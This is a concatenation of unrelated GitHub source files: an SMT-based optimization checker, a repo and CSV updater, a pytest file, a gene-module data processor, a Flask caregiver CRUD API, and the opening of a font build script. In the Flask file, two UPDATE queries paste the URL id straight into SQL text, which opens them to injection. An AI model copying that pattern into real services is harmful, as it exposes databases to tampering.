\"\"\"\n logger.info('Checking refinement of %r', opt.name)\n\n encoding = smtinterp.lookup(encoding)\n smt = encoding(type_model)\n\n asm = smt.conjunction(opt.asm)\n premise = asm.aux + asm.safe + asm.value\n if asm.defined or asm.nonpoison:\n raise Exception('Defined/Non-poison condition declared by assumption')\n\n pre = smt.conjunction(opt.pre)\n premise += pre.aux\n if pre.defined or pre.nonpoison:\n raise Exception('Defined/Non-poison condition declared by precondition')\n\n src = smt(opt.src)\n if src.aux:\n raise Exception('Auxiliary condition declared by source')\n\n tgt = smt(opt.tgt)\n premise += tgt.aux\n\n def check_expr(stage, expr):\n m = satisfiable(expr, opt.name, _stage_name[stage])\n if m is not None:\n raise CounterExampleError(stage, m, type_model, opt.src, src.value,\n tgt.value, encoding)\n\n if pre.safe:\n check_expr(PRESAFE, mk_and(premise + [mk_not(pre.safe)]))\n\n premise += pre.value\n\n inhabited = assume_inhabited or \\\n satisfiable(mk_and(premise), opt.name, 'inhabited') is not None\n\n if tgt.safe:\n check_expr(TGTSAFE, mk_and(premise + [mk_not(tgt.safe)]))\n\n premise += src.defined\n if config.poison_undef:\n premise += src.nonpoison\n\n if tgt.defined:\n expr = premise + [mk_not(tgt.defined)]\n check_expr(UB, mk_forall(src.qvars, expr))\n\n if not config.poison_undef:\n premise += src.nonpoison\n\n if tgt.nonpoison:\n check_expr(POISON, mk_forall(src.qvars, premise + [mk_not(tgt.nonpoison)]))\n\n check_expr(UNEQUAL,\n mk_forall(src.qvars, premise + [z3.Not(src.value == tgt.value)]))\n\n return inhabited\n\n\n_stage_name = {\n PRESAFE: 'precondition safety',\n TGTSAFE: 'target safety',\n UB: 'undefined behavior',\n POISON: 'poison',\n UNEQUAL: 'equality',\n}\n\nheader = '''(set-info :source |\n Generated by Alive-NJ\n More info in N. P. Lopes, D. Menendez, S. Nagarakatte, J. Regehr.\n Provably Correct Peephole Optimizations with Alive. In PLDI'15.\n|)\n'''\n\n\ndef satisfiable(expr, opt_name='', stage=''):\n \"\"\"Return a model satisfying the SMT expression, if any. Return None if\n the expression is unsatisfiable. Raise Error if the solver cannot determine\n satisfiability.\n \"\"\"\n s = z3.Solver()\n if config.timeout is not None:\n s.set('timeout', config.timeout)\n s.add(expr)\n logger.debug('%s check for %s\\n%s', stage, opt_name, s)\n\n time_start = time.time()\n res = s.check()\n time_end = time.time()\n\n solve_time = time_end - time_start\n\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug('\\nresult: %s\\ntime: %s\\nstats\\n%s', res, solve_time,\n s.statistics())\n\n if config.bench_dir and solve_time >= config.bench_threshold:\n files = glob.glob(config.bench_dir + '/*.smt2')\n filename = '{0}/{1:03d}.smt2'.format(config.bench_dir, len(files))\n logger.debug('Writing benchmark file %r', filename)\n fd = open(filename, 'w')\n fd.write(header)\n fd.write('; {0} check for {1!r}\\n'.format(stage, opt_name))\n fd.write('; time: {0} s\\n\\n'.format(solve_time))\n fd.write(s.to_smt2())\n fd.close()\n\n if res == z3.sat:\n m = s.model()\n logger.debug('counterexample: %s', m)\n\n return m\n\n if res == z3.unknown:\n raise Error('Model returned unknown: ' + s.reason_unknown())\n\n return None\n\n\ndef format_z3val(val):\n if isinstance(val, z3.BitVecNumRef):\n w = val.size()\n u = val.as_long()\n s = val.as_signed_long()\n\n if u == s:\n return '0x{1:0{0}x} ({1})'.format((w+3)/4, u)\n return '0x{1:0{0}x} ({1}, {2})'.format((w+3)/4, u, s)\n\n if isinstance(val, z3.FPRef):\n return str(val)\n\nclass Error(error.Error):\n pass\n\nclass CounterExampleError(Error):\n def __init__(self, cause, model, types, src, srcv, tgtv, trans):\n self.cause = cause\n self.model = model\n self.types = types\n self.src = src\n self.srcv = srcv\n self.tgtv = tgtv\n self.trans = trans\n\n cause_str = {\n PRESAFE: 'Precondition is unsafe',\n TGTSAFE: 'Target is unsafe',\n UB: 'Target introduces undefined behavior',\n POISON: 'Target introduces poison',\n UNEQUAL: 'Mismatch in values',\n }\n\n def __str__(self):\n\n smt = self.trans(self.types)\n\n vars = [v for v in proper_subterms(self.src)\n if isinstance(v, (Input, Instruction))]\n\n ty_width = 1\n name_width = 1\n rows = []\n for v in vars:\n ty = str(self.types[v])\n ty_width = max(ty_width, len(ty))\n\n name = v.name\n name_width = max(name_width, len(name))\n\n interp = smt(v)\n\n if z3.is_false(self.model.evaluate(mk_and(interp.nonpoison))):\n # FIXME: make sure interp.nonpoison fully evaluates\n # e.g., what if it depends on a qvar somehow?\n rows.append((ty, name, 'poison'))\n\n else:\n val = self.model.evaluate(smt.eval(v), model_completion=True)\n # this will pick arbitrary values for any source qvars or\n # other unconstrained values\n\n rows.append((ty, name, format_z3val(val)))\n\n interp = smt(self.src)\n if z3.is_false(self.model.evaluate(mk_and(interp.nonpoison))):\n srcval = 'poison'\n else:\n srcval = format_z3val(self.model.evaluate(self.srcv, True))\n\n if self.cause == UB:\n tgtval = 'undefined'\n elif self.cause == POISON:\n tgtval = 'poison'\n else:\n tgtval = format_z3val(self.model.evaluate(self.tgtv, True))\n\n return '''{cause} for {srcty} {src}\n\nExample:\n{table}\nsource: {srcval}\ntarget: {tgtval}'''.format(\n cause = self.cause_str[self.cause],\n srcty = self.types[self.src],\n src = self.src.name,\n table = '\\n'.join(\n '{0:>{1}} {2:{3}} = {4}'.format(ty, ty_width, name, name_width, val)\n for ty, name, val in rows),\n srcval = srcval,\n tgtval = tgtval,\n )\n","repo_name":"rutgers-apl/alive-nj","sub_path":"alive/refinement.py","file_name":"refinement.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"94"} +{"seq_id":"31494880346","text":"\nimport requests\nimport io\nfrom ede.ede._logger import logger\n\nimport os\nimport sys\nfrom git import Repo\n\n\nclass updateFiles:\n def __init__(self, args=None):\n self.args = args\n logger.info(\n f\"typo de argumento: {type(self.args)}, valores: {self.args}\")\n self.filesDict = {\n '1cicAFFfrVQPfqh7j40So3bQqvrte_LtdPwTHLXh8F_A': './ede/ede/RegistroEDE.csv'\n }\n self.localRepoDirectory = os.path.join(os.getcwd())\n self.destination = 'master'\n\n def execute(self):\n if os.path.exists(self.localRepoDirectory):\n logger.info(\n f'Directorio existe, se actualizarán los archivos. {self.localRepoDirectory}')\n try:\n repo = Repo(self.localRepoDirectory)\n except:\n logger.error(\n f'Por favor verifique que exista el directorio \".git\" en {self.localRepoDirectory}')\n return False\n origin = repo.remotes.origin\n origin.pull(self.destination)\n else:\n logger.info(\n 'Directorio no existe, se clonará repositorio completo desde https://github.com/Admin-EDE/DockerEdeCode')\n Repo.clone_from(\"https://github.com/Admin-EDE/DockerEdeCode\",\n self.localRepoDirectory, branch=self.destination)\n\n for idFile, fileName in self.filesDict.items():\n self.downloadFile(idFile, fileName)\n\n def downloadFile(self, idFile: str, fileName: str) -> str:\n urlFile = f'http://drive.google.com/uc?export=download&id={idFile}'\n urlFile2 = f'https://docs.google.com/spreadsheets/d/{idFile}/export?format=csv&id={idFile}'\n if \"--debug\" in sys.argv:\n http.client.HTTPConnection.debuglevel = 1\n\n logger.info(\n f'Intentando descargar archivo: {fileName} desde url: {urlFile}')\n try:\n if (idFile == '1cicAFFfrVQPfqh7j40So3bQqvrte_LtdPwTHLXh8F_A'):\n response = requests.get(urlFile2)\n else:\n response = requests.get(urlFile)\n response.raise_for_status()\n except Exception as e:\n pathFile = None\n logger.error(f'No se pudo descargar el arhivo {fileName}. \\n {e}')\n else:\n if not os.path.exists('./ede/ede'):\n os.makedirs('./ede/ede')\n if not os.path.exists('./csv'):\n os.makedirs('./csv')\n\n with open(fileName, 'wb') as out:\n # Read bytes into file\n out.write(io.BytesIO(response.content).read())\n pathFile = fileName\n logger.info(f'Arhivo {pathFile} guardado con éxito.')\n\n return pathFile\n","repo_name":"Admin-EDE/DockerEdeCode","sub_path":"ede/ede/updateFiles.py","file_name":"updateFiles.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"94"} +{"seq_id":"7686658696","text":"from pytest_mock import mocker\n\nfrom modules.DBRepo.ActorDBRepo import ActorDBRepo\nfrom modules.entities.Actor import Actor\nfrom modules.usecases.ActorUsecases import ActorUsecases\nfrom tests.domain.ActorBuilder import ActorMother\n\n\nclass TestActorsUsecase:\n def test_get_one_success(self, simple_actor):\n # arrange\n test_id = simple_actor.id\n usecase = ActorUsecases(ActorDBRepo())\n expected_actor = ActorDBRepo.decode_orm_actor(simple_actor)\n\n # act\n result_actors = usecase.get_actor(test_id)\n\n # assert\n assert result_actors.first_name == expected_actor.first_name\n assert result_actors.last_name == expected_actor.last_name\n\n def test_get_one_no_result(self):\n usecase = ActorUsecases(ActorDBRepo())\n\n result_actors = usecase.get_actor(1)\n assert result_actors is None\n\n def test_get_one_wrong_params(self):\n usecase = ActorUsecases(ActorDBRepo())\n\n result_actors = usecase.get_actor(-100)\n assert result_actors is None\n","repo_name":"ansushina/web_bmstu","sub_path":"backend/tests/app/integration/usecase/test_actors_usecase.py","file_name":"test_actors_usecase.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15780901032","text":"import re\n\nclass Data_Processer:\n\tdef data_extract(self, infile, deletes):\n\t\tf = open(infile, 'r')\n\t\tlines = f.readlines()\n\t\tdict_array = {}\n\t\tsplit_l = ((lines[5]).rstrip()).split('\\t')\n\t\tfor i in range(len(split_l)):\n\t\t\tdict_array['arr_'+str(i)] = []\n\t\tif (deletes == 0):\n\t\t\tfor l in lines:\n\t\t\t\tsplit_l = (l.rstrip()).split('\\t')\n\t\t\t\tfor x in range(len(split_l)):\n\t\t\t\t\tdict_array['arr_'+str(x)].append(split_l[x])\n\t\telif (deletes > 0):\n\t\t\tfor l in lines[deletes:]:\n\t\t\t\tsplit_l = (l.rstrip()).split('\\t')\n\t\t\t\tfor x in range(len(split_l)):\n\t\t\t\t\tdict_array['arr_'+str(x)].append(split_l[x])\n\t\tf.close(); #print(dict_array);\n\t\treturn dict_array\n\n\tdef DEG_Cluster(self, infile, outfile):\n\t\tf = open(outfile,'w')\n\t\tdict1 = self.data_extract(infile,1)\n\t\tgene_ids, fold_change, pval = dict1['arr_0'], dict1['arr_2'], dict1['arr_6']\n\t\tfor i in range(len(fold_change)):\n\t\t\tif ((float(fold_change[i]) >= 1) and (float(pval[i]) <= 0.05)):\n\t\t\t\tf.write(gene_ids[i]+\"\\t\")\n\t\t\tif ((float(fold_change[i]) <= -1) and (float(pval[i]) <= 0.05)):\n\t\t\t\tf.write(gene_ids[i]+\"\\t\")\n\t\tf.write(\"\\n\"); f.close();\n\n\tdef Module_Clusters(self, infile, outfile1, outfile2):\n\t\tdict2 = self.data_extract(infile,1)\n\t\tgenes_ids, modules = dict2['arr_0'], dict2['arr_1']\n\t\tgenes = [ids.replace('\"','') for i, ids in enumerate(genes_ids)]\n\n\t\tmods = []\n\t\tfor module in modules:\n\t\t\tif int(module) not in mods:\n\t\t\t\tmods.append(int(module))\n\t\tmods.sort()\n\t\tx = 0; gene=[];\n\t\tfile2 = open(outfile1,'w'); file3 = open(outfile2,'w');\n\t\tfor mod in mods:\n\t\t\tfile2.write(str(mod)+\"\\t\")\n\t\t\tfor x in range(len(modules)):\n\t\t\t\tif (int(modules[x]) == int(mod)):\n\t\t\t\t\tgene.append(genes[x])\n\t\t\t\t\tfile2.write(genes[x]+\"\\t\"); file3.write(genes[x]+\"\\t\");\n\t\t\tfile2.write(\"\\n\"); file3.write(\"\\n\");\n\t\tfile2.close(); file3.close();\n\n\tdef DEGClusters_2_WGCNAModules(self, infile1, infile2, outfile1, infile3, outfile2):\n\t\t# All DEGs\n\t\tfile1 = open(infile1,'r'); file3 = open(outfile1,'w'); file5 = open(outfile2,'w');\n\t\tline1 = file1.readline()\n\t\tDEG_transcripts = []; indices = [];\n\t\twhile line1:\n\t\t\tline1 = line1.rstrip()\n\t\t\tsplit_line1 = line1.split('\\t')\n\t\t\tfor tids in split_line1:\n\t\t\t\tDEG_transcripts.append(tids)\n\t\t\tDEG_transcripts.append('\\n')\n\t\t\tline1 = file1.readline()\n\n\t\tfor items in range(len(DEG_transcripts)):\n\t\t\tif DEG_transcripts[items] == '\\n':\n\t\t\t\tindices.append(items); print(items)\n\n\t\t# Modules using WGCNA\n\t\tdict3 = self.data_extract(infile2,1) \n\t\tgene_ids, modules = dict3['arr_0'], dict3['arr_1']\n\t\tgene_id = [val.replace('\"','') for i, val in enumerate(gene_ids)]\n\t\t\n\t\tk = 0; DEG1_Module = [];\n\t\tfor genes in DEG_transcripts:\n\t\t\tif (k < int(indices[0])):\t# Cluster of DEGs\n\t\t\t\tif (genes in gene_id):\n\t\t\t\t\tindexes = gene_id.index(genes); print(indexes, genes, gene_id[indexes]);\n\t\t\t\t\tDEG1_Module.append(modules[indexes])\n\t\t\t\t\tfile3.write(gene_id[indexes]+\"\\t\"+modules[indexes]+\"\\n\")\n\t\t\tk += 1\n\n\t\tfile3.close(); file1.close();\n\n\t\tdict4 = self.data_extract(infile3,0) \n\t\tgeneid, mod = dict4['arr_0'], dict4['arr_1']\n\n\t\tmodset = sorted(set(mod), reverse=False); print(modset);\n\t\tfor i in modset:\n\t\t\tfile5.write(str(i)+'\\t')\n\t\t\tindices = [index for index, element in enumerate(mod) if element == i]; #print(i, indices);\n\t\t\tm = 0\n\t\t\tfor j in indices:\n\t\t\t\tm += 1; print(geneid[j], mod[j])\n\t\t\t\tif m < len(indices):\n\t\t\t\t\tfile5.write(geneid[j]+',')\n\t\t\t\telif m == len(indices):\n\t\t\t\t\tfile5.write(geneid[j]+'\\n')\n\n\t\tfile5.close();\n\nif __name__ == \"__main__\":\n\tData_Processer().DEG_Cluster('CF_Vs_LB_Significant.txt', 'PAO1_Cluster_DEG_BiologicalReplicates.txt')\n\tData_Processer().Module_Clusters('Module_Assignment_PAO1_WGCNA.tsv', 'PAO1_Modules_Clusters.txt', 'WGCNA_PAO1_Modules_Clusters.txt')\n\tData_Processer().DEGClusters_2_WGCNAModules('PAO1_Cluster_DEG_BiologicalReplicates.txt', 'Module_Assignment_PAO1_WGCNA.tsv', 'PAO1_DEG_Modules.txt', 'PAO1_DEG_Modules.txt', 'PAO1_DEG_Genes_Modules.txt')\n\n\n\n","repo_name":"Ronika19/PAO1_Network","sub_path":"Cystic_Fibrosis/CF_LB/Data_Process.py","file_name":"Data_Process.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"19558427630","text":"import json\nfrom flask import Blueprint, jsonify, request, make_response, current_app\nfrom psycopg2.extras import DictCursor\nfrom db import close_db, get_db\n\ncaregiver_bp = Blueprint('caregiver', __name__)\n\n@caregiver_bp.route(\"/mycaregiver/\", methods=[\"GET\"])\ndef get_mycaregivers(phone):\n try:\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor(cursor_factory=DictCursor)\n\n # Fetch the caregivers related to the phone number\n cursor.execute(\n \"SELECT * FROM caregivers WHERE phone = %s ORDER BY id DESC\", (phone,))\n rows = cursor.fetchall()\n\n # Close the connection\n cursor.close()\n\n if not rows:\n return jsonify({\"error\": \"Caregivers not found\"}), 404\n\n caregivers = [\n {\n \"id\": row[\"id\"],\n \"name\": row[\"name\"],\n \"years_of_experience\": row[\"years_of_experience\"],\n \"age\": row[\"age\"],\n \"education\": row[\"education\"],\n \"gender\": row[\"gender\"],\n \"phone\": row[\"phone\"],\n \"imageurl\": row[\"imageurl\"],\n \"location\": row[\"location\"]\n }\n for row in rows\n ]\n\n return jsonify(caregivers)\n except Exception as e:\n current_app.logger.error(\n f\"Error fetching caregivers for phone {phone}\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch caregivers\"}), 500\n\n\n@caregiver_bp.route(\"/mycaregiver/\", methods=[\"PUT\"])\ndef update_caregiver(id):\n current_app.logger.debug(f\"Entering update_caregiver for id {id}\")\n try:\n data = request.get_json()\n\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor()\n\n # Define the columns and values for the UPDATE query\n # Added location to the list\n columns = [\"name\", \"location\"]\n # Using .get() to avoid KeyError\n values = []\n\n for field in columns:\n value = data.get(field, None)\n if field == 'location' and isinstance(value, list):\n # Serialize dict to JSON string\n values.append(json.dumps(value))\n else:\n values.append(value)\n\n current_app.logger.debug(f\"Serialized location: {json.dumps(value)}\")\n current_app.logger.debug(f\"Prepared values for SQL update: {values}\")\n\n # Construct the UPDATE query\n update_query = \"UPDATE caregivers SET \" + \\\n ', '.join([f\"{col} = %s\" for col in columns]) + f\" WHERE id = {id}\"\n\n # Execute the UPDATE query with the values\n cursor.execute(update_query, values)\n\n current_app.logger.info(f\"Received data: {data}\")\n current_app.logger.info(f\"Executing query: {update_query}\")\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n return jsonify({\"success\": \"更新成功\"}), 200\n\n except Exception as e:\n current_app.logger.error(\n f\"Error updating caregiver: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to update caregiver\"}), 500\n\n\n@caregiver_bp.route('/all_caregivers', methods=['GET'])\ndef get_all_caregivers():\n current_app.logger.info(\n \"---------------Entering GET /all_caregivers request\")\n try:\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor(cursor_factory=DictCursor)\n\n # Fetch caregivers from the database\n cursor.execute(\"SELECT * FROM caregivers ORDER BY id DESC\")\n rows = cursor.fetchall()\n current_app.logger.debug(\n f\"Fetched {len(rows)} caregivers from the database\")\n\n # Close the connection\n cursor.close()\n\n if not rows:\n current_app.logger.warning(\"No caregivers found in the database\")\n return jsonify({\"error\": \"Problem of fetching caregivers\"}), 404\n\n # Directly convert the rows into JSON\n caregivers = [dict(row) for row in rows]\n\n # Format the data for JSON\n caregivers = [\n {\n \"id\": row[\"id\"],\n \"name\": row[\"name\"],\n \"years_of_experience\": row[\"years_of_experience\"],\n \"age\": row[\"age\"],\n \"education\": row[\"education\"],\n \"gender\": row[\"gender\"],\n \"phone\": row[\"phone\"],\n \"imageurl\": row[\"imageurl\"],\n \"location\": row[\"location\"],\n \"hourlycharge\": row[\"hourlycharge\"]\n }\n for row in rows\n ]\n\n current_app.logger.debug(\"Successfully processed all caregivers data\")\n\n response = make_response(jsonify(caregivers))\n response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0'\n response.headers['Pragma'] = 'no-cache'\n return response\n except Exception as e:\n current_app.logger.error(\"Error fetching all caregivers\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch all caregivers\"}), 500\n \n@caregiver_bp.route(\"/all_caregivers/\", methods=[\"GET\"])\ndef get_caregiver_detail(caregiver_id):\n try:\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor(cursor_factory=DictCursor)\n\n # Fetch the specific caregiver from the database using the id\n cursor.execute(\"SELECT * FROM caregivers WHERE id = %s\",\n (caregiver_id,))\n row = cursor.fetchone()\n\n # Close the connection\n cursor.close()\n\n # Check if a caregiver with the given id exists\n if not row:\n return jsonify({\"error\": \"Caregiver not found\"}), 404\n\n # Format the data for JSON\n caregiver = {\n \"id\": row[\"id\"],\n \"name\": row[\"name\"],\n \"years_of_experience\": row[\"years_of_experience\"],\n \"age\": row[\"age\"],\n \"education\": row[\"education\"],\n \"gender\": row[\"gender\"],\n \"phone\": row[\"phone\"],\n \"imageurl\": row[\"imageurl\"],\n \"location\": row[\"location\"],\n \"hourlycharge\": row[\"hourlycharge\"]\n }\n\n return jsonify(caregiver)\n except Exception as e:\n current_app.logger.error(\n f\"Error fetching caregiver detail for id {caregiver_id}\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch caregiver detail\"}), 500\n\n\n@caregiver_bp.route(\"/all_caregivers\", methods=[\"POST\"])\ndef add_caregiver():\n try:\n data = request.get_json()\n\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor()\n\n # Define the mandatory columns and values for the INSERT query\n mandatory_columns = [\"name\", \"phone\",\n \"imageurl\", \"location\", \"hourlycharge\"]\n values = [data[field] if field != 'location' else json.dumps(\n data[field]) for field in mandatory_columns]\n\n # Optional fields: yearsOfExperience, age, education, gender\n # Add them to the INSERT query only if they are present in the data\n optional_fields = [\"years_of_experience\", \"age\", \"education\", \"gender\"]\n for field in optional_fields:\n if field in data:\n mandatory_columns.append(field)\n values.append(data[field])\n else:\n # If the optional field is missing, set a default value or NULL\n # For example, set the yearsOfExperience to NULL\n # You can customize the default values as needed\n mandatory_columns.append(field)\n values.append(None)\n\n # Construct the INSERT query with the appropriate number of placeholders\n insert_query = f\"INSERT INTO caregivers ({', '.join(mandatory_columns)}) VALUES ({', '.join(['%s'] * len(mandatory_columns))}) RETURNING id\"\n\n # Execute the INSERT query with the values\n cursor.execute(insert_query, values)\n new_caregiver_id = cursor.fetchone()[0]\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n # Return the newly created caregiver data with the assigned ID\n # imageUrl is possibly from const [imageUrl, setImageUrl] = useState(null) in CaregiverForm.tsx\n new_caregiver = {\n \"id\": new_caregiver_id,\n \"name\": data[\"name\"],\n \"phone\": data[\"phone\"],\n \"age\": data[\"age\"],\n \"education\": data[\"education\"],\n \"gender\": data[\"gender\"],\n \"years_of_experience\": data[\"years_of_experience\"],\n \"imageurl\": data[\"imageurl\"],\n \"location\": data[\"location\"],\n \"hourlycharge\": data[\"hourlycharge\"]\n }\n return jsonify(new_caregiver), 201\n\n except Exception as e:\n current_app.logger.error(f\"Error adding caregiver: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to add caregiver\"}), 500\n\n@caregiver_bp.route(\"/caregiver_schedule\", methods=[\"POST\"])\ndef add_caregiver_schedule():\n try:\n data = request.get_json()\n\n # Log the received data for debugging\n current_app.logger.debug(\"Received data caregiver_schedule: %s\", data)\n\n # Validate that careneeder_id is provided\n if \"caregiver_id\" not in data:\n return jsonify({\"error\": \"caregiver_id is required\"}), 400\n\n # Define the columns for the INSERT query\n columns = [\"scheduletype\", \"totalhours\", \"frequency\",\n \"startdate\", \"selectedtimeslots\", \"durationdays\", \"caregiver_id\"]\n\n # Initialize values list\n values = []\n\n # Iterate through the columns and append the values if they exist\n for column in columns:\n if column in data:\n values.append(data[column])\n else:\n values.append(None)\n\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor()\n\n # Construct the INSERT query with placeholders for all columns\n columns_placeholder = ', '.join(columns)\n values_placeholder = ', '.join(['%s'] * len(columns))\n insert_query = f\"INSERT INTO caregiverschedule ({columns_placeholder}) VALUES ({values_placeholder}) RETURNING id\"\n\n # Execute the INSERT query with the values\n cursor.execute(insert_query, values)\n new_schedule_id = cursor.fetchone()[0]\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n # Create the returned object based on the Schedule interface\n new_schedule = {\n \"id\": new_schedule_id,\n }\n\n # Include columns in the return object if they exist\n for column in columns:\n if column in data:\n new_schedule[column] = data[column]\n\n return jsonify(new_schedule), 201\n\n except Exception as e:\n if conn:\n conn.rollback()\n current_app.logger.error(\n f\"Error adding schedule: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to add schedule\"}), 500\n finally:\n if conn:\n conn.close() \n\n@caregiver_bp.route('/all_caregiverschedule', methods=['GET'])\ndef get_all_caregiverschedule():\n current_app.logger.info(\"Entering GET /all_caregiverschedule request\")\n try:\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor(cursor_factory=DictCursor)\n\n # Fetch careneederschedule data from the database\n cursor.execute(\"SELECT * FROM caregiverschedule ORDER BY id DESC\")\n rows = cursor.fetchall()\n current_app.logger.debug(\n f\"Fetched {len(rows)} caregiverschedule records from the database\")\n\n # Close the connection\n cursor.close()\n\n if not rows:\n current_app.logger.warning(\n \"No caregiverschedule records found in the database\")\n return jsonify({\"error\": \"No caregiverschedule data available\"}), 404\n\n # Format the data for JSON\n\n caregiverschedule = [dict(row) for row in rows]\n\n current_app.logger.debug(\n \"Successfully processed all caregiverschedule data\")\n\n response = make_response(jsonify(caregiverschedule))\n response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0'\n response.headers['Pragma'] = 'no-cache'\n return response\n except Exception as e:\n current_app.logger.error(\n \"Error fetching all caregiverschedule\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch all caregiverschedule\"}), 500 \n \n\n@caregiver_bp.route(\"/caregiver_ads\", methods=[\"POST\"])\ndef add_caregiver_ad():\n try:\n data = request.get_json()\n\n # Define the columns for the INSERT query\n columns = [\"title\", \"description\", \"caregiver_id\"]\n\n # Initialize values list\n values = []\n\n # Iterate through the columns and append the values if they exist\n for column in columns:\n if column in data:\n values.append(data[column])\n else:\n values.append(None)\n\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor()\n\n # Construct the INSERT query with placeholders for all columns\n columns_placeholder = ', '.join(columns)\n values_placeholder = ', '.join(['%s'] * len(columns))\n insert_query = f\"INSERT INTO caregiverads ({columns_placeholder}) VALUES ({values_placeholder}) RETURNING id\"\n\n # Execute the INSERT query with the values\n cursor.execute(insert_query, values)\n new_ad_id = cursor.fetchone()[0]\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n # Create the returned object based on the ad interface\n new_ad = {\n \"id\": new_ad_id,\n }\n\n # Include columns in the return object if they exist\n for column in columns:\n if column in data:\n new_ad[column] = data[column]\n\n return jsonify(new_ad), 201\n\n except Exception as e:\n if conn:\n conn.rollback() # Rolling back in case of an error\n current_app.logger.error(\n f\"Error adding caregiver ad: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to add caregiver ad\"}), 500\n finally:\n if conn:\n conn.close()\n\n\n@caregiver_bp.route(\"/all_caregiverads\", methods=[\"GET\"])\ndef get_caregiver_ads():\n try:\n # Connect to the PostgreSQL database\n conn = get_db()\n # Use DictCursor to fetch rows as dictionaries\n cursor = conn.cursor(cursor_factory=DictCursor)\n\n # Execute the SELECT query to fetch all records from the caregiverads table\n select_query = \"SELECT * FROM caregiverads ORDER BY id DESC\"\n cursor.execute(select_query)\n\n # Fetch all rows and close the cursor\n rows = cursor.fetchall()\n cursor.close()\n\n current_app.logger.debug(\n f\"Fetched {len(rows)} caregiverads records from the database\")\n\n # Check the data type of the first row for debugging\n if rows:\n current_app.logger.debug(f\"First row data type: {type(rows[0])}\")\n\n if not rows:\n current_app.logger.warning(\n \"No caregiverads records found in the database\")\n return jsonify({\"error\": \"No caregiverads data available\"}), 404\n\n caregiverads = [dict(row) for row in rows]\n\n current_app.logger.debug(\"Successfully processed all caregiverads data\")\n\n response = make_response(jsonify(caregiverads))\n response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0'\n response.headers['Pragma'] = 'no-cache'\n return response\n\n except Exception as e:\n if conn:\n conn.rollback() # Rolling back in case of an error\n current_app.logger.error(\n f\"Error fetching caregiver ads: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to fetch caregiver ads\"}), 500\n\n finally:\n if conn:\n conn.close() \n\n@caregiver_bp.route(\"/api/mycaregiver//ad\", methods=[\"PUT\"])\ndef update_caregiver_ad(id):\n caregiver_bp.logger.debug(f\"Entering update_caregiver for id {id}\")\n try:\n data = request.get_json()\n\n # Connect to the PostgreSQL database\n conn = get_db()\n cursor = conn.cursor()\n\n # Define the columns and values for the UPDATE query\n columns = [\"title\", \"description\"]\n values = [data.get(field, None) for field in columns]\n\n current_app.logger.debug(f\"Prepared values for SQL update: {values}\")\n\n # Construct the UPDATE query\n update_query = \"UPDATE caregiverads SET \" + \\\n ', '.join([f\"{col} = %s\" for col in columns]) + \\\n f\" WHERE caregiver_id = {id}\"\n\n # Execute the UPDATE query with the values\n cursor.execute(update_query, values)\n\n current_app.logger.info(f\"Received data: {data}\")\n current_app.logger.info(f\"Executing query: {update_query}\")\n\n # Commit the changes and close the connection\n conn.commit()\n cursor.close()\n\n return jsonify({\"success\": \"更新成功\"}), 200\n\n except Exception as e:\n current_app.logger.error(\n f\"Error updating caregiver: {str(e)}\", exc_info=True)\n return jsonify({\"error\": \"Failed to update caregiver\"}), 500 ","repo_name":"chen0112/Caregiver_backend","sub_path":"caregiver.py","file_name":"caregiver.py","file_ext":"py","file_size_in_byte":17762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35731608832","text":"import argparse\nimport copy\nimport re\nimport datetime\n\nfrom fontTools.designspaceLib import DesignSpaceDocument\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.ttLib import TTFont, newTable, getTableModule\nfrom fontTools.ttLib.tables._h_e_a_d import mac_epoch_diff\nfrom fontTools.varLib import build as merge\nfrom fontTools.misc.transform import Transform\nfrom fontTools.pens.pointPen import PointToSegmentPen\nfrom fontTools.pens.reverseContourPen import ReverseContourPen\nfrom fontTools.pens.t2CharStringPen import T2CharStringPen\nfrom fontTools.pens.transformPen import TransformPen\nfrom glyphsLib import GSFont, GSGlyph, GSLayer, GSComponent, GSAnchor\nfrom glyphsLib.glyphdata import get_glyph as getGlyphInfo\nfrom cffsubr import subroutinize\n\n\nDEFAULT_TRANSFORM = [1, 0, 0, 1, 0, 0]\n\n# https://www.microsoft.com/typography/otspec/os2.htm#cpr\nCODEPAGE_RANGES = {\n 1252: 0,\n 1250: 1,\n 1251: 2,\n 1253: 3,\n 1254: 4,\n 1255: 5,\n 1256: 6,\n 1257: 7,\n 1258: 8,\n # 9-15: Reserved for Alternate ANSI\n 874: 16,\n 932: 